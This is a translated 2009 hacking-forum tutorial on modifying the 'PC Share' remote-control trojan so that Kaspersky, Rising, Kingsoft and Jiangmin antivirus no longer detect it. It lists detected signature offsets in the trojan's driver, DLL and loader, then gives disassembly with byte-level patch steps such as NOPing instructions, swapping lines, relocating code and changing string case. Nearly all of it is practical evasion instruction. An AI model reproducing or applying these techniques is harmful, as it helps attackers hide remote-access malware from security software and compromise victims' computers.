PC Share: published signatures and how to modify them


2009/2/21  Editor: Anonymous  Source: compiled by this site  Keywords:


1. Locating the signatures
Kaspersky:
pchide.sys:
[Signature] 00000986_00000001
pcmain.dll
[Signature] 0000BB02_00000001
pcinit.exe
[Signature] 00000825_00000001
[Signature] 00001369_00000001

Rising:
pchide.sys:
[Signature] 00000D56_00000001
pcmain.dll:
[Signature] 0000BB49_00000001
pcinit.exe
[Signature] 00000673_00000001
[Signature] 00000827_00000001
[Signature] 00000D5B_00000001

Kingsoft:
pchide.sys:
[Signature] 00000D3E_00000001
pcmain.dll:
Reverse:
[Signature] 0000BAB4_00000001
[Signature] 0000BABB_00000001
[Signature] 0000DE28_00000001
[Signature] 0000DE79_00000001
pcinit.exe:
[Signature] 00001238_00000001
[Signature] 00001265_00000001

Jiangmin:
pchide.sys:
[Signature] 00000DAF_00000001
pcmain.dll:
[Signature] 0000BB0A_00000001
pcinit.exe:
[Signature] 000008BC_00000001
[Signature] 00000EE4_00000001
[Signature] 000012BA_00000001

########################################################################################################################
2. Modifying the signatures:
//***********************************************************************************************************************
Kaspersky:
pchide.sys:
[Signature] 00000986_00000001
00010975:  FF15 20030100              CALL [10320]
0001097B:  33C0                       XOR EAX,EAX
0001097D:  EB 11                      JMP SHORT 00010990
0001097F:  50                         PUSH EAX
00010980:  33C0                       XOR EAX,EAX       // NOP this out
00010982:  33C0                       XOR EAX,EAX
00010984:  0F84 03000000              JE 0001098D
0001098A:  55                         PUSH EBP
0001098B:  8211 58                    ADC BYTE PTR [ECX],58
//---------------------------------------------------------------------------------------------------------------------
pcmain.dll
[Signature] 0000BB02_00000001
1000BAF9:  EB 4E                      JMP SHORT 1000BB49
1000BAFB:  57                         PUSH EDI
1000BAFC:  56                         PUSH ESI
1000BAFD:  53                         PUSH EBX
1000BAFE:  E8 FDF8FFFF                CALL 1000B400     // 2. change 1000B400 to 1000B3F8
1000BB03:  83FE 01                    CMP ESI,1

1000B3F8                                                // 1. move the code at 1000B400 to here

1000B3FE:  90                         NOP
1000B3FF:  90                         NOP
1000B400:  8B4424 08                  MOV EAX,[ESP+8]
1000B404:  81EC 24050000              SUB ESP,524
1000B40A:  83F8 01                    CMP EAX,1
1000B40D:  56                         PUSH ESI
1000B40E:  57                         PUSH EDI
//---------------------------------------------------------------------------------------------------------------------
pcinit.exe
[Signature] 00000825_00000001  00401425
0040081D:  FFD6                       CALL NEAR ESI
0040081F:  6A 06                      PUSH 1            //
00400821:  58                         POP EAX
00400822:  5F                         POP EDI
00400823:  5E                         POP ESI
00400824:  5B                         POP EBX
00400825:  C9                         LEAVE
[Signature] 00001369_00000001  00401F69
The call at this location: stepping into it shows the code below. Move the first four instructions into an empty area of the file, then change the call's target address accordingly; that defeats detection.

00401429  /$  55                    push    ebp
0040142A  |.  8BEC                  mov     ebp, esp
0040142C  |.  81EC 00010000         sub     esp, 100
00401432  |.  80A5 00FFFFFF 00      and     byte ptr [ebp-100], 0
00401439  |.  56                    push    esi
0040143A  |.  57                    push    edi

55 8B EC 81 EC 00 01 00 00 80 A5 00 FF FF FF 00

00401FDB      00                    db      00
00401FDC      00                    db      00

//***********************************************************************************************************************
Rising:
pchide.sys:
[Signature] 00000D56_00000001
00010D4C:  6A 3B                      PUSH 3B
00010D4E:  59                         POP ECX
00010D4F:  33C0                       XOR EAX,EAX          // sub eax,eax
00010D51:  8DBD 02FEFFFF              LEA EDI,[EBP-1FE]
00010D57:  F3                         REP STOS DWORD PTR ES:[EDI]
//---------------------------------------------------------------------------------------------------------------------
pcmain.dll: (At the start of this segment there is a jump to 1000BB49; NOP out the xor eax, eax immediately above it and that is enough.)
[Signature] 0000BB49_00000001              1000C749
1000BB3A:  85C0                       TEST EAX,EAX
1000BB3C:  74 08                      JE SHORT 1000BB46
1000BB3E:  57                         PUSH EDI
1000BB3F:  56                         PUSH ESI
1000BB40:  53                         PUSH EBX
1000BB41:  FFD0                       CALL EAX
1000BB43:  8945 0C                    MOV [EBP+C],EAX
1000BB46:  8B45 0C                    MOV EAX,[EBP+C]
1000BB49:  5F                         POP EDI
1000BB4A:  5E                         POP ESI
//---------------------------------------------------------------------------------------------------------------------
pcinit.exe
[Signature] 00000673_00000001  00401273
00400664:  56                         PUSH ESI
00400665:  8B31                       MOV ESI, [DWORD DS:ECX]
00400667:  57                         PUSH EDI
00400668:  66:8B7C24 0C               MOV DI, [WORD SS:ESP+C]
0040066D:  66:893C96                  MOV [WORD DS:ESI+EDX*4], DI
00400671:  8B31                       MOV ESI, [DWORD DS:ECX]
00400673:  0FB710                     MOVZX EDX, [WORD DS:EAX]       // swap position with the previous line
00400676:  66:8B7C24 10               MOV DI, [WORD SS:ESP+10]
[Signature] 00000827_00000001  00401427
0040081D:  FFD6                       CALL NEAR ESI
0040081F:  6A 06                      PUSH 6                   // already changed while patching for Kaspersky; originally: push 1
00400821:  58                         POP EAX
00400822:  5F                         POP EDI
00400823:  5E                         POP ESI
00400824:  5B                         POP EBX
00400825:  C9                         LEAVE
00400826:  C2 0C00                    RETN C
[Signature] 00000D5B_00000001  0040195B
00400D30:  FF15 34204000              CALL NEAR [DWORD DS:402034]
00400D36:  8BF8                       MOV EDI, EAX
00400D38:  897D EC                    MOV [DWORD SS:EBP-14], EDI
00400D3B:  FF15 38204000              CALL NEAR [DWORD DS:402038]
00400D41:  3D B7000000                CMP EAX, B7
00400D46:  0F84 E1020000              JE 0040102D
00400D4C:  68 30750000                PUSH 7530
00400D51:  57                         PUSH EDI
00400D52:  FF15 6C204000              CALL NEAR [DWORD DS:40206C]
00400D58:  85C0                       TEST EAX, EAX              // change to: and eax,eax
//***********************************************************************************************************************
Kingsoft:
pchide.sys:
[Signature] 00000D3E_00000001
00010D2A:  73 00                      JNB     SHORT 00010D2C
00010D2C:  5C                         POP     ESP
00010D2D:  0000                       ADD     [EAX],AL
00010D2F:  0055 8B                    ADD     [EBP-75],DL
00010D32:  EC                         IN      AL,DX
00010D33:  81EC 18020000              SUB     ESP,218
00010D39:  56                         PUSH    ESI
00010D3A:  57                         PUSH    EDI
00010D3B:  BE 020D0100                MOV     ESI,10D02
00010D40:  8DBD F0FDFFFF              LEA     EDI,[EBP-210]   // swap position with the previous line!
//---------------------------------------------------------------------------------------------------------------------
pcmain.dll:
Reverse:
[Signature] 0000BAB4_00000001
1000BAB3:  55                         PUSH EBP
1000BAB4:  8BEC                       MOV EBP,ESP  // swap with the line below; afterwards add 4 to every following [EBP+8]-style offset
1000BAB6:  53                         PUSH EBX
1000BAB7:  8B5D 08                    MOV EBX,[EBP+8]
1000BABA:  56                         PUSH ESI
[Signature] 0000BABB_00000001           // already covered by the previous change, since the two are adjacent

[Signature] 0000DE28_00000001              // for these two, simply changing the letter case is enough (uppercase + 20h = lowercase)
[Signature] 0000DE79_00000001
//---------------------------------------------------------------------------------------------------------------------
pcinit.exe:
[Signature] 00001238_00000001  00401E38
[Signature] 00001265_00000001  00401E65
00401259:  8965 E8                    MOV [EBP-18],ESP
0040125C:  33DB                       XOR EBX,EBX
0040125E:  895D FC                    MOV [EBP-4],EBX
00401261:  6A 02                      PUSH 2
00401263:  FF15 8C204000              CALL [40208C]

//***********************************************************************************************************************
Jiangmin:
pchide.sys:
[Signature] 00000DAF_00000001
00010D96:  59                         POP     ECX
00010D97:  59                         POP     ECX
00010D98:  8D85 F0FDFFFF              LEA     EAX,[EBP-210]
00010D9E:  50                         PUSH    EAX
00010D9F:  8D45 F8                    LEA     EAX,[EBP-8]
00010DA2:  50                         PUSH    EAX
00010DA3:  FF15 10030100              CALL    NEAR [10310]
00010DA9:  68 200F0100                PUSH    10F20
00010DAE:  8D85 F8FEFFFF              LEA     EAX,[EBP-108]     // swap this line with the line above
00010DB4:  50                         PUSH    EAX
//---------------------------------------------------------------------------------------------------------------------
pcmain.dll:
[Signature] 0000BB0A_00000001
1000BAF7:  90                         NOP
1000BAF8:  90                         NOP
1000BAF9:  EB 4E                      JMP SHORT 1000BB49
1000BAFB:  57                         PUSH EDI
1000BAFC:  56                         PUSH ESI
1000BAFD:  53                         PUSH EBX
1000BAFE:  E8 F5F8FFFF                CALL 1000B3F8
1000BB03:  83FE 01                    CMP ESI,1
1000BB06:  8945 0C                    MOV [EBP+C],EAX          // swap position with the instruction above!
1000BB09:  75 0C                      JNZ SHORT 1000BB17
1000BB0B:  85C0                       TEST EAX,EAX
1000BB0D:  75 37                      JNZ SHORT 1000BB46
//---------------------------------------------------------------------------------------------------------------------
pcinit.exe:
[Signature] 000008BC_00000001  004014BC

[Signature] 00000EE4_00000001  00401AE4
00400EC3:  50                         PUSH EAX
00400EC4:  8D86 06080000              LEA EAX,[ESI+806]
00400ECA:  50                         PUSH EAX
00400ECB:  FFD3                       CALL EBX
00400ECD:  8D86 06080000              LEA EAX,[ESI+806]
00400ED3:  68 78304000                PUSH 403078
00400ED8:  50                         PUSH EAX
00400ED9:  FFD3                       CALL EBX
00400EDB:  8D8D 34FEFFFF              LEA ECX,[EBP-1CC]
00400EE1:  8D86 06090000              LEA EAX,[ESI+906]
00400EE7:  51                         PUSH ECX
00400EE8:  50                         PUSH EAX
[Signature] 000012BA_00000001  00401EBA         // relocate
00401EB8  |.  59                    pop     ecx
00401EB9  |>  E8 E2000000           call    00401FA0
00401EBE  |.  68 0C304000           push    0040300C

00401FA0  /$  68 00000300           push    30000                                     ; /CWmask = 30000
00401FA5  |.  68 00000100           push    10000                                     ; |CWnew = 10000
00401FAA  |.  E8 0D000000           call    <jmp.&MSVCRT._controlfp>                  ; \_controlfp
00401FAF  |.  59                    pop     ecx
00401FB0  |.  59                    pop     ecx
00401FB1  \.  C3                    retn

68 00 00 03 00 68 00 00 01 00

00401FF2      68 00000300           push    30000
